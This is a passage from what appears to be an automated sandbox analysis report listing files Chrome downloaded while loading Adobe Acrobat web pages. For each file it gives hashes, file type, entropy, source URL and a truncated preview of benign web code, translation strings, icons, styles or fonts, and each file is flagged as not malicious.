                  Preview:(self["webpackJsonp-preview"]=self["webpackJsonp-preview"]||[]).push([[7920],{lFrp:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.ReactBackend=void 0;var i=function(){function defineProperties(e,t){for(var n=0;n<t.length;n++){var i=t[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,i.key,i)}}return function(e,t,n){return t&&defineProperties(e.prototype,t),n&&defineProperties(e,n),e}}(),o=n("f/0J"),a=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(n("KybH"));var s=t.ReactBackend=function(e){function ReactBackend(){return function _classCallCheck(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,ReactBackend),function _possibleConstructorReturn(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(ReactBackend.__proto__||Object.getPrototypeO
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65411), with no line terminators
                  Category:downloaded
                  Size (bytes):86951
                  Entropy (8bit):4.822052051738292
                  Encrypted:false
                  SSDEEP:
                  MD5:A87E07FBF3B0E84A3EA7BB04A82C67CD
                  SHA1:E1C40835AEADC233C9090CEFB78E5C0DFDD31557
                  SHA-256:C3FBE50E7C77E886C503AC823BAFD622A33D1E9D5E54C3797B3D3C2C0611A01F
                  SHA-512:7F45B5C2900EC16C3EA5F3C7B4E9D6912FFEAF5B50143ABCCB69D7914E352B507522BC92F3A9ADE86E9CC85EE127F39C0BFE620F482575A87305370A5FD75E51
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/translations-en-US-json-chunk.js
                  Preview:"use strict";(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[3577],{t39f:e=>{e.exports=JSON.parse('{"genAI.optIn.dialog.title":"Generative AI in Acrobat","genAI.optIn.dialog.agree":"Agree","genAI.optIn.dialog.cancel":"Cancel","genAI.optIn.dialog.confirm":"OK","genAI.optIn.dialog.content.description":"Now you can enhance document productivity with generative AI in Acrobat. As you explore, please keep these points in mind:","genAI.optIn.dialog.content.option1":"Using generative AI in Acrobat to engage in infringing, unlawful, or unethical acts is prohibited.","genAI.optIn.dialog.content.option2":"You.re responsible for any content you create using generative AI in Acrobat.","genAI.optIn.dialog.content.age.guideline":"You confirm that you.re 18 years old or older.","genAI.optIn.dialog.footer.guidelines":"By clicking <bold>Agree</bold>, you agree to our {guidelinesLink}.","genAI.optIn.dialog.footer.settings":"To disable generative AI features, go to <bold>Settings >
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):65644
                  Entropy (8bit):4.693089206172513
                  Encrypted:false
                  SSDEEP:
                  MD5:BD2ED71CEB43E59EEDBA5BA5F077C626
                  SHA1:9F8D9D927390F493F395C9D8D74F53CF65518977
                  SHA-256:484A8264645A628CC5EDFB67EBC4AB4F7B5CD2D2B2ADE615FD40F6E03A2B7D93
                  SHA-512:52EC2F03EFB197FB59A8C92AF4B29B82DC3248BCA1669F5A2237C39526A6DA97C8B88680FCBD1F724BCD4161254BF5949178E1D02B4D066C8BD2F85E0A328F8C
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.683.0/tile-icons.js
                  Preview:(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[7979,5092,7760],{"8BCc":(e,l,t)=>{var a=t("YWiy");function A12SplitPdf24(e){return a.createElement("svg",e,a.createElement("g",{id:"A12_Split-pdf_24",stroke:"none",strokeWidth:"1",fill:"none",fillRule:"evenodd"},a.createElement("g",{transform:"translate(1.000000, 0.000000)",fill:"#D7373F",fillRule:"nonzero"},[a.createElement("path",{d:"M12.6767776,1.00019208 L12.7879026,1.00726736 C12.9708813,1.03121746 13.1409678,1.11520928 13.2720072,1.24802135 L13.2720072,1.24802135 L16.7437634,4.53199165 L16.8190863,4.61827384 C16.9345681,4.76956131 16.9989527,4.95637301 17.0000125,5.15028646 L17.0000125,5.15028646 L16.996,14.5241921 L15.6020907,12.7990162 L15.4644298,12.6188526 L15.328728,12.4562013 C14.7276523,11.782684 13.9280674,11.4792957 12.9717792,11.9811074 L12.9717792,11.9811074 L12.8155145,12.0784151 L12.6719914,12.1911613 C11.9008581,12.8438333 11.8425584,13.7245285 12.2954091,14.5178627 C12.3066131,14.5
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (39436), with no line terminators
                  Category:downloaded
                  Size (bytes):39476
                  Entropy (8bit):4.832824187210905
                  Encrypted:false
                  SSDEEP:
                  MD5:B9091952B24E4280E9B92FFED889F885
                  SHA1:0EECD5E72A7FAAE557C981C9F28BBCBF63FAE373
                  SHA-256:43D6BFC632CE354887B0CD167BE594725EBC37896A781F79069BB6E89A53657F
                  SHA-512:8080C680E62FD3C75C402060C7282A8AB8B13856C01F6AE44C7FA6D283AF2BEF3451AB0B76C2684273004B0968E18D6F74E336103AC299BF828E5312C02F9D2B
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-edit-dropin/3.17.0_3.90.0/translations6-chunk.js
                  Preview:"use strict";(self["webpackJsonp-edit"]=self["webpackJsonp-edit"]||[]).push([[6103,7322],{R5i5:e=>{e.exports=JSON.parse('{"lifecycle.dropzone.crop.label.seo":"Crop PDF pages","lifecycle.dropzone.crop.description.mobile.seo":"Crop pages on desktop with a 7-day free trial of Acrobat Pro."}')},t39f:e=>{e.exports=JSON.parse('{"badge.new":"NEW","badge.beta":"Beta","tooltip.editPDF":"Edit Text & Images","tooltip.undo":"Undo","tooltip.redo":"Redo","tooltip.addText":"Add text","tooltip.addText.nonEditSubscription":"Add text","tooltip.addText.editToolsAnon":"Add text","aria.label.addText":"Add text to the page","aria.label.addImage":"Add image to the page","tooltip.modernViewerAddText":"Add text","tooltip.modernViewerAddImage":"Add image","tooltip.addImage":"Add an image","tooltip.addImage.nonEditSubscription":"Add an image","tooltip.addImage.editToolsAnon":"Add an image","tooltip.home":"Home","tooltip.close":"Close Edit PDF","tooltip.save":"Save PDF","tooltip.image":"This is an image","tooltip
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (10744)
                  Category:downloaded
                  Size (bytes):10812
                  Entropy (8bit):5.66549847365671
                  Encrypted:false
                  SSDEEP:
                  MD5:4376D8FE9C45E3D7F5FF5B13C685CA07
                  SHA1:4CE0C4ACCCCCC454E5EB2704D879F5B2E7C4C0C2
                  SHA-256:BFDB9999C1CA77FFA40EC459FDF843B3831F9D20029565ADFE935F97A16C9ED8
                  SHA-512:F13352BC302866E1DA2AA89767A87532CCCBACC768298B3345E8709D6ED5336E90C6508AE2E201CDDA4DB466E105B59BBEFE89E6AA4560111F6853DAA0776A8A
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/home/34df8e8885/libs/sentry/worker.min.js
                  Preview:/*! For license information please see worker.min.js.LICENSE.txt */.var t=Uint8Array,n=Uint16Array,r=Int32Array,e=new t([0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0,0,0,0]),i=new t([0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13,0,0]),a=new t([16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15]),s=function(Q,R){for(var V=new n(31),W=0;W<31;++W)V[W]=R+=1<<Q[W-1];var X=new r(V[30]);for(W=1;W<30;++W)for(var Y=V[W];Y<V[W+1];++Y)X[Y]=Y-V[W]<<5|W;return{b:V,r:X}},o=s(e,2),f=o.b,h=o.r;f[28]=258,h[258]=28;for(var l=s(i,0).r,u=new n(32768),c=0;c<32768;++c){var v=(43690&c)>>1|(21845&c)<<1;v=(61680&(v=(52428&v)>>2|(13107&v)<<2))>>4|(3855&v)<<4,u[c]=((65280&v)>>8|(255&v)<<8)>>1}var d=function(Q,R,V){for(var W=Q.length,X=0,Y=new n(R);X<W;++X)Q[X]&&++Y[Q[X]-1];var Z,$=new n(R);for(X=1;X<R;++X)$[X]=$[X-1]+Y[X-1]<<1;if(V){Z=new n(1<<R);var tt=15-R;for(X=0;X<W;++X)if(Q[X])for(var nt=X<<4|Q[X],rt=R-Q[X],et=$[Q[X]-1]++<<rt,it=et|(1<<rt)-1;et<=it;++et)Z[u[et]>>tt]=nt}else fo
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (34395)
                  Category:downloaded
                  Size (bytes):34443
                  Entropy (8bit):4.804262082828672
                  Encrypted:false
                  SSDEEP:
                  MD5:3E0663E04DA6D2A0C3E2C31888CC6406
                  SHA1:35E497A38361D90F250330B5F46F3C4FFB352F01
                  SHA-256:35394AA6A0C3AFC2FEF40A5E9B045FD057FCD337D0B68AF0FEB767F3D71521C3
                  SHA-512:066B329E53C79547EE77A45419A6177ACB881C06FD34C1D7C4854A8EF646B6BEE91B65A5BF77E7467594C77EDE0D4CD502FF6487FB25B15BFFD09CA7240B392E
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.683.0/24-24-icons.js
                  Preview:(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[983],{QEeY:(e,t,l)=>{var L=l("YWiy");function A12CCXCustomPage(e){return L.createElement("svg",e,[L.createElement("path",{d:"M21.34375,9H11.65625c-1.46688,0-2.65625,1.21987-2.65625,2.72436v9.55128c0,1.50449,1.18937,2.72436,2.65625,2.72436h9.6875c1.46688,0,2.65625-1.21987,2.65625-2.72436V11.72436c0-1.50449-1.18937-2.72436-2.65625-2.72436Zm-3.10338,10.61522l-1.53259-3.57642c-.08233-.19412-.34899-.19293-.43072,.00119l-.75108,1.78642c-.06622,.15721,.04892,.33049,.21954,.33049,0,0,.37882-.00298,.40268-.00298,.57987,0,1.04996,.46983,1.04996,1.04803s-.46831,1.04684-1.04698,1.04803h-2.35645c-.7469,0-1.2516-.75982-.96167-1.447l2.11603-5.02997c.2613-.61989,.87338-1.02302,1.54631-1.02302s1.27905,.40195,1.54094,1.02005l2.12975,5.03057c.29172,.68777-.21298,1.44879-.96167,1.44879-.35317-.00119-.75347-.15661-.96406-.63418Z",fill:"var(--iconIndigo, #5258e4)",key:0}),L.createElement("path",{d:"M7,20c0,.71131,.14853,1.3
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (11598), with no line terminators
                  Category:downloaded
                  Size (bytes):11620
                  Entropy (8bit):5.381309143568083
                  Encrypted:false
                  SSDEEP:
                  MD5:E9DDFFA190B34944FDA42D3E0FCD82C0
                  SHA1:66EED80113929CB020B16805D70BF565DD7C9619
                  SHA-256:C492F9D486C655AF41E356FF91C1C347B41014411B798B415171BEFF765C4CDF
                  SHA-512:4AECA4999959230EBDD81848E1DAB20511BB769DFED99EB65F4714D374F7EE6DE68A7DB2834BEBF921084BBA120F092B6648285E7CA48CDC154B6F22ADAC5498
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-tutorial-dropin/3.35.0_4.95.0/translations-en-US-json-chunk.js
                  Preview:"use strict";(self["webpackJsonp-tutorial-dropin"]=self["webpackJsonp-tutorial-dropin"]||[]).push([[3577],{t39f:_=>{_.exports=JSON.parse('{"ACCESS_DENIED":"Access Denied","NO_ACCESS_MSG":"You do not have access to this service. Contact your IT administrator to gain access.","SIGN_IN_DIFF":"Sign in with a different account","TUTORIAL_PANEL_HEADER_CLOSE":"Close tutorial panel","TUTORIAL_PANEL_HEADER_TITLE":"Hands-on Tutorial","TUTORIAL_PANEL_BANNER_LABEL":"Get started with Acrobat online","TUTORIAL_BANNER_ALT_EDIT_DEMO":"Edit and organize a PDF in Acrobat","TUTORIAL_BANNER_TITLE_EDIT_DEMO":"Edit and organize a PDF in Acrobat","TUTORIAL_BANNER_DESCRIPTION_EDIT_DEMO":"Follow easy steps to edit text in a PDF, rotate an image, and reorder pages.","TUTORIAL_BANNER_DURATION_EDIT_DEMO":"2 min","TUTORIAL_END_TITLE_EDIT_DEMO_SIGNED_IN":"Do more with PDFs","TUTORIAL_END_DESCRIPTION_EDIT_DEMO_SIGNED_IN":"Use your new skills in a file of your own and explore more Acrobat tools.","TUTORIAL_END_TITLE_
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), CFF, length 36388, version 1.0
                  Category:downloaded
                  Size (bytes):36388
                  Entropy (8bit):7.99205462986647
                  Encrypted:true
                  SSDEEP:
                  MD5:B2FE0D9753FE193A7965B201CCEB9547
                  SHA1:5F2D96F6BFD11797A53E9A2832CA5A2F53211556
                  SHA-256:A4DF96CBF8E2CAA44973A92CC15757C900EFC169039CE07E36F4E0FBC86B0216
                  SHA-512:332002E448764248BACB1BEE03591F51AFDC3E83CDAA54AA4C924F7916121C4EF5DF5291D08ADA611D8A5106F6CCE104202327CBF4888E77FC0FF22A64178930
                  Malicious:false
                  Reputation:unknown
                  URL:https://use.typekit.net/af/74ffb1/000000000000000000017702/27/l?primer=0635fba006f1437d962ae878ad04a353e0c3568e4d5bde3554eb7e3e05ddd02d&fvd=i4&v=3
                  Preview:wOF2OTTO...$.......T.............................F...x?DYNA.|?GDYN.9..\.`..f...6.$..@....~. .Z... ..q...2.............zN..^5. ..g...o~..?..o........q...<...Z....fw....''&....\....d?....J.P.V@.O.XWG.I*"..4.o.B...N.4s....8.<.j'..h.z....z.........Z.X.$....i.l!|6..L,,.v....l....6...-.yp.<=.?..^-...-.,.+h.....l;[.b..V.......%?..]...z.........d.......K..wkih.&.u...F)bE..b..nwow.a..+h.A.;b..@@E...%F...#.?....%1.@K.F!1.c.\...=.......V.......n...1.....'.....p Ol........7/.......n.`.M.4.I.@v....Er......3..Bww+.......S.E......{R^..K........r.T......?<..... .N.r.|.n...>x.... M.....*q....9....:.%<..4...Oo..l..X.t....t.....\w%.Q.jtn....VX...6._w)+....V.....FvP..t.h^xP|.U}]?|..G..arY..>.2...<"..|..i.~..w!\ ..L+e.&.i.]..eX...l..%.2f.[.y.c....;..TP.......D...a.@.......j.{U..c..N.Aj)/.k.Y./...q1..@...h..3-{.]%......v..a.hW2.@.Jm.D;..SE`.A....T.Gpu...Q.i.Vh....#\.........u....>q..........=..._.[G.......V.............:h..h...AP..0. ....RH..d..|,.jl........\.]<
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (14288), with no line terminators
                  Category:dropped
                  Size (bytes):14288
                  Entropy (8bit):5.263260291941625
                  Encrypted:false
                  SSDEEP:
                  MD5:82BC3D4F9CE13B3EB5CB7C9892210AB8
                  SHA1:963ACA30FC57BA3E9549D4A8D680AF8D9EE65628
                  SHA-256:5AEB33767085E3AAE5CB6F8392183CD5FD38065474D8E5FB9E8A5FE27294FEE6
                  SHA-512:DC65275D0D4683939C9183B13196AB81E5E72F203F2DF4583D7BBDDE68739E96A77F2419917E9D876619515E513CD0E49BAF3B33B8098A0ED98913FC1F8B9012
                  Malicious:false
                  Reputation:unknown
                  Preview:.ExpandableContainer__collapseSection___3BnUj div[data-testid=collapse-caret-icon]{display:flex;height:32px;height:var(--spectrum-global-dimension-size-400,32px);align-content:center;justify-content:center;border:1px solid #e6e6e6;border:1px solid var(--spectrum-global-color-gray-200,#e6e6e6);border-radius:5px;border-radius:var(--spectrum-global-dimension-size-65,5px)}.ExpandableContainer__collapseSection___3BnUj div[data-testid=collapse-title-message]{font-size:14px;font-size:var(--spectrum-global-dimension-size-175,14px)}.ExpandableContainer__stickyHeader___1v-EG{width:800px;width:calc(400px*2);width:calc(var(--spectrum-global-dimension-size-5000, 400px)*2);display:none;z-index:1;background-color:#f6f6f6;background-color:var(--spectrum-global-color-gray-50,#f6f6f6)}.ExpandableContainer__stickyHeader___1v-EG.ExpandableContainer__isSticky___Wku-b{position:fixed;top:0;top:var(--spectrum-global-dimension-size-0,0)}.ExpandableContainer__stickyHeader___1v-EG.ExpandableContainer__showSticky
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):96
                  Entropy (8bit):5.56372187554087
                  Encrypted:false
                  SSDEEP:
                  MD5:4D2E131521A592EA4D8ED8A2A443EBF6
                  SHA1:AB118F25D3538342DEA648FE1C3F97B4817527C2
                  SHA-256:6C7606A80DF026DD0FB8837851FBFB346C703F21714E236249219CCE8BCCDB6E
                  SHA-512:B5E6FF8E37EB0C9B4528F2D754BFB31AEBB6449FCB208007134841279DB113BEF9FBDE01E07D85CFC8EDC7970BF635DE0CECFC2497D3CC23624E2D168DD7F7CD
                  Malicious:false
                  Reputation:unknown
                  Preview:+6xZpYgqaMTUb69UL507xByDOesZyWWvHkCQryEJpo72dlU1mcVco1g0tkSYrhDC1IhiUX8eii352cmpvF5ebgOeIIESVA==
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (4054)
                  Category:downloaded
                  Size (bytes):4094
                  Entropy (8bit):5.21009529808194
                  Encrypted:false
                  SSDEEP:
                  MD5:DDD66269A6EC0ED8EB419BC5671C3C5E
                  SHA1:DE823C0984BB132780C9265619628406644D74C9
                  SHA-256:B0AE27FB87ABBB6E9B823318C29E423364AF0CAD0E546A7DDB73786B3BFEFFF0
                  SHA-512:B5366A9895DAAD4473AB355DF2449E6D75725F2BB1AC642A2F39E2BE3A35A2FF40E73DC0C14830A414B7DB1BEBA3E8ECF5B0FF24DE58F44D8D2615CB6220055F
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-web-app-dropin/3.71.0_2.210.0/282.js
                  Preview:(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[282],{W61N:(e,i,o)=>{"use strict";o.r(i),o.d(i,{default:()=>y});var t=o("YWiy"),r=o("abd3"),s=o("VjBA"),n=o("/hLX"),l=o.n(n),a=o("plsW"),d=o("5InX"),p=o.n(d);const c=a.logging.getLogger("ModalDialog");class ModalDialog extends t.Component{constructor(e){super(e),this.show=()=>{const e=this.props.dropinCls;if(e&&!this.modalKey){var i;const o=this.props.location,r=a.router.getQueryParams(o.search)["dialog!dropin"];r&&"string"==typeof r&&(null===(i=a.envUtil.getEnvVar("dialog-dropins"))||void 0===i?void 0:i.includes(r))?(c.emit("RSP dialog",{type:"RSP v3"}),a.discovery.loadDropinClass("modal-container").then((i=>{let{ModalContainerAPI:o}=i;this.modalKey||(this.modalKey=o.show(t.createElement(e,{inModalContainer:!0,onClose:this.onClose})),this.modalType="v3")}))):(c.emit("RSP dialog",{type:"RSP v2"}),this.modalKey=p().show(t.createElement(e,{inModalContainer:!0,onClose:this.onClose})),this.modalType="v2")}},this.hide=()
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1531)
                  Category:downloaded
                  Size (bytes):1578
                  Entropy (8bit):5.256177839517021
                  Encrypted:false
                  SSDEEP:
                  MD5:61D0563F20C67B0FAB43E1736FB9FFD8
                  SHA1:B7200B8FB0F08BB91DB8C80FE62C031E76B923D1
                  SHA-256:7203FB7E75C9095C90E1246857B60A6AA21B67F76B5EBA2F3F8F45868A04A1EB
                  SHA-512:F34C84A54512C9973E6137B896E4083C7E0F94EA01F236B7C7D733EB49B2516D54BBE8E6C50282D28C771001BB347533A8402D1D2A88E55983BEF721D9F71760
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-web-app-dropin/3.71.0_2.210.0/device-api.js
                  Preview:"use strict";(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[160],{"+s7r":(e,t,i)=>{i.r(t),i.d(t,{default:()=>DeviceAPI});class DeviceAPI{constructor(){this.getBrowserName=()=>this.userAgent.getBrowser().name,this.getBrowser=()=>this.userAgent.getBrowser(),this.getOS=()=>this.userAgent.getOS(),this.getEngineName=()=>this.userAgent.getEngine().name,this.isMobile=()=>{const e=this.userAgent.getDevice().type;return e&&null!==e.match(/(phone|mobile|tablet)/i)},this.isTablet=()=>{const e=this.userAgent.getDevice().type;return e&&null!==e.match(/tablet/i)},this.isPhoneSize=function(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:550;return window.matchMedia(`(max-width: ${e}px)`).matches},this.isTabletSize=function(){const e=`(min-width: ${arguments.length>1&&void 0!==arguments[1]?arguments[1]:550}px)`,t=`(max-width: ${arguments.length>0&&void 0!==arguments[0]?arguments[0]:767}px)`;return window.matchMedia(`${e} and ${t}`).matches},this.isTouchDevice=()=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (367)
                  Category:downloaded
                  Size (bytes):597
                  Entropy (8bit):4.962009973885516
                  Encrypted:false
                  SSDEEP:
                  MD5:2C43710E370CE18095C841D5B5D40814
                  SHA1:6A83A016E5529BE7FC2F4C762FD86804AEB110BF
                  SHA-256:F60BE5BB4045E3B20D29B24B7EA871C02161EA4F2A14C89724358D159DD02928
                  SHA-512:7103D375151542DC14ACAB92812D3D030ED698B001F18E3D7278BA524FD53A4BE9115821BAE8CE624DFE7DA6C9A8E5D0D945F64A3FC356CE8F5AC3D4F8D88F13
                  Malicious:false
                  Reputation:unknown
                  URL:https://ui.messaging.adobe.com/2.78.7/index.html?lc=en_us
                  Preview:<!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="stylesheet" href="style.css"><title>Adobe Chat</title><script></script><script defer="defer" src="bundle.js"></script><link href="style.css" rel="stylesheet"></head><style>html {. width: 100%;. height: 100%;. }.. body {. width: 100%;. height: 100%;. background: #eaeaea;. }</style><body><div id="parentContainer" style="height: 100%; display: flex; justify-content: center;"/></body></html>
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (40004)
                  Category:downloaded
                  Size (bytes):40166
                  Entropy (8bit):5.2231936174769
                  Encrypted:false
                  SSDEEP:
                  MD5:A687F202FFAF4F4B18FC1AB8C4CEDA54
                  SHA1:3128129B46CECC3267A8969A40D71DB2D3771DC6
                  SHA-256:886B7844CC8DB2006441D8F74AABEC6CB018133454B4E0E0AA48DC676DD43479
                  SHA-512:881F1AA18D448177E1DA7AF0ADCA9C0906EF0122FDA74C81FEB28F2B6D0971E4AB19AF6E7980A55D2CE07D32CA8B2C9AF049062ADD06FE1A325561C9B573D62E
                  Malicious:false
                  Reputation:unknown
                  URL:https://prod.adobeccstatic.com/unav/1.4/UniversalNav.js
                  Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */./*! For license information please see UniversalNav.js.LICENSE.txt */.(()=>{var e,t,r={61:(e,t,r)=>{"use strict";r.d(t,{Z:()=>n});const n={componentVsContentMap:{"app-switcher":"AppLauncherPopover",help:"HelpPopover"},componentVsLoaderMap:{profile:"ProfileLoader",notifications:"NotificationLoader"},componentVsTooltipMap:{"app-switcher":"APP_LAUNCHER_TOOLTIP",help:"HELP_MENU_TOOLTIP",cart:"CART_TOOLTIP"},THEMES:{LIGHT:"light",DARK:"dark",EXPRESS:"express"},childrenOrder:["cart","help","notifications","app-switcher","profile"],unavCompVsWorkflowMap:{"app-switcher":"App Switcher",help:"Help",notifications:"Notifications",profile:"Profile",cart:"Cart"},universalNavSentenceCase:"Universal Nav",universalNavHyphenCase:"universal-nav"}},498:(e,t,r)=>{"use strict";function n(e){return n="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"functio
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (9311)
                  Category:downloaded
                  Size (bytes):9366
                  Entropy (8bit):5.177867531766508
                  Encrypted:false
                  SSDEEP:
                  MD5:05616E808988C14EEBB4984FE9364C64
                  SHA1:4C5699E28D27295794B526D8E606F6CCE51CF2F7
                  SHA-256:FB6A1D4A46A4BA0F3ACF3C57DE19B77FA3ED0E7B0575E59F0C1FDD192207FA1F
                  SHA-512:54161595E148D60F8F3EC2004F2768C9AB56A1DC8978AA870743E8935E32D2D8BEE80087ED1CB5B7BFCAB6CF12F9B49E91C89F6DFF1996ACADB5B2C0FB3EE49F
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.586.0/focus-region-chunk.js
                  Preview:"use strict";(self["webpackJsonp-global-nav"]=self["webpackJsonp-global-nav"]||[]).push([[396],{EptA:(e,t,r)=>{r.r(t),r.d(t,{default:()=>FocusRegionProvider});var i=r("nia0"),o=r("plsW"),n=r("1UgG");const s=class CyclicCounter{constructor(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:Number.MAX_SAFE_INTEGER;if(this.counter=-1,this.upperLimit=Number.MAX_SAFE_INTEGER,null===e||e<0)throw new RangeError("Argument 'upperLimit' must be a positive number.");this.upperLimit=e}get value(){return this.counter}get max(){return this.upperLimit-1}increment(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:1;if(e<1)throw new RangeError(`Parameter 'value' (${e}) must be a positive number.`);return this.counter=(this.counter+e)%this.upperLimit,this.counter}decrement(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:1;if(e<1)throw new RangeError(`Parameter 'value' (${e}) must be a positive number.`);this.counter=this.counter<0?0:this.counter;const t=this.count
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (3831)
                  Category:downloaded
                  Size (bytes):3897
                  Entropy (8bit):5.388606176491299
                  Encrypted:false
                  SSDEEP:
                  MD5:7564820A2527F691EC66CF88D51F7759
                  SHA1:62BCDC75D0F7951395E43B738B6254E642F28E19
                  SHA-256:0960C3CB602BE889FCFE5608B6AAC8EFE80B024E53C2B26509EB4A32F69856BF
                  SHA-512:24ED8B1CA2E5A28F55C6EDEF746E4DDEBD408CB18B8B4939782A40F921E70576156E0793CCA5EBFEF1A00BB7A0C9E774205BA88B14FB83537AB84300D269C161
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1349.0/discover-panel-provider-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},i=(new e.Error).stack;i&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[i]="26bd48e3-d3e1-4e43-9c76-bddef2907120",e._sentryDebugIdIdentifier="sentry-dbid-26bd48e3-d3e1-4e43-9c76-bddef2907120")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"939110932eed36816ac9d538606bc3479c9c8233"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[7038],{"va3/":(e,i,r)=>{r.d(i,{Hn:()=>w,ID:()=>p,Pq:()=>c,W8:()=>n,Wj:()=>u,aB:()=>t,f:()=>y,he:()=>f,l4:()=>m,oN:()=>g,r7:()=>v,vW:()=>l,vt:()=>b,x8:()=>P,yq:()=>h,z:()=>S});const t="verb-compress-pdf",n="verb-createpdf",s="verb-pdf-to-image",a="verb-reorder-pages",o="verb-rotate-pages",d="verb-add-comment",l="verb-desktop-acrobat",c="verb-edit-pdf",b="verb-export-pdf",v="verb-fillsign",g="verb-mobile-r
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):16
                  Entropy (8bit):3.75
                  Encrypted:false
                  SSDEEP:
                  MD5:D4AD1856E0411BA43FBE6445E2A697D0
                  SHA1:5D0AFF2F652FBBF227DE1676096CA93F666ACEC3
                  SHA-256:8C0D1F525B76CFA89A582821364CE764F33F83F052C1CE02214C8F0229399FF0
                  SHA-512:21629A2A759D7294934C983025FC7B2900644D88953ED6F9F2F5A79E81EEF37EB186ACB84CE428563DA4C61F308184E78593E43ED5A4A81BC6F2AC72A8AB88A6
                  Malicious:false
                  Reputation:unknown
                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCbkRpcikhsIeEgUNP0ukgyHEgiKjLCgDog==?alt=proto
                  Preview:CgkKBw0/S6SDGgA=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (11277)
                  Category:downloaded
                  Size (bytes):11318
                  Entropy (8bit):5.668092685430667
                  Encrypted:false
                  SSDEEP:
                  MD5:5AE8A193983400C091F6C143DE08E373
                  SHA1:9A3016EBC721291C7A95A82D41CB457073DA6885
                  SHA-256:8A9F6813ABE3C52273C5082530417BA308BAF0E9027C6B21924F1532B36C0068
                  SHA-512:8253489BEBDB2F9C2D0FD2EB574B9656091C485D7DEC48ADEEDADF1D62097197957CC205C42C2F0ECE35F4128C6EA7BF5FC13FAC82C710B09BB9FC7DE40FD457
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-ccverbs-dropin/3.17.1_2.303.0/9164.js
